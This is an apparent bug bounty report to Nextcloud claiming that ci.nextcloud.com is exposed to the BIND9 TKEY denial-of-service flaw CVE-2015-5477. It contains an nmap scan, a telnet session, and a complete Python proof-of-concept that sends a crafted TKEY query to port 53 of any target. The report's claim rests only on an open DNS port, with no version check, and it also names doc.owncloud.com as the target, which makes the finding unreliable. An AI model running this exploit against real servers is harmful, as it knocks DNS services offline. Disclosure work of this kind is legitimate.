hackerone / m4ncrypt / H1:237860
History: Jun 07, 2017 - 11:28 p.m.

Nextcloud: ci.nextcloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)

2017-06-07 23:28:05
m4ncrypt
hackerone.com

7.8 High (CVSS2): AV:N/AC:L/Au:N/C:N/I:N/A:C
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: COMPLETE

EPSS: 0.973 High (Percentile 99.8%)

Hello Team NextCloud,

In reference to report #217381,
I've reported the DDoS attack via the DNS port at OwnCloud…
And it was successfully patched.

But now I got the same issue at

ci.nextcloud.com

Proof Of Concept:
Here is the nmap result for ci.nextcloud.com

NMap Scan Results:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-08 04:12 PKT
Nmap scan report for ci.nextcloud.com (█████)
Host is up (0.077s latency).
rDNS record for █████████: ███████
Not shown: 96 filtered ports
PORT    STATE SERVICE    VERSION
22/tcp  open  tcpwrapped
53/tcp  open  tcpwrapped
80/tcp  open  tcpwrapped
443/tcp open  tcpwrapped

Now here is the telnet result:

──╼ $telnet
telnet> open
(to) ci.nextcloud.com 53
Trying ███...
Connected to ci.nextcloud.com.
Escape character is '^]'.

So this can lead to a serious DDoS attack at doc.owncloud.com using the exploit…

Exploit Link:

https://github.com/elceef/tkeypoc/

Vulnerability Reference CVE Details:

https://vulners.com/cve/CVE-2015-5477

Exploit PoC:

Exploit Title: PoC for BIND9 TKEY DoS

Exploit Author: elceef

Software Link: https://github.com/elceef/tkeypoc/

Version: ISC BIND 9

Tested on: multiple

CVE : CVE-2015-5477

#!/usr/bin/env python
# Python 2 script: str.decode('hex') is not available in Python 3

import socket
import sys

print('CVE-2015-5477 BIND9 TKEY PoC')

if len(sys.argv) < 2:
    print('Usage: ' + sys.argv[0] + ' [target]')
    sys.exit(1)

print('Sending packet to ' + sys.argv[1] + ' ...')

# crafted TKEY query, given as a hex string and converted to raw bytes
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))

# single UDP datagram to the DNS port
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))

print('Done.')

Thanks :)
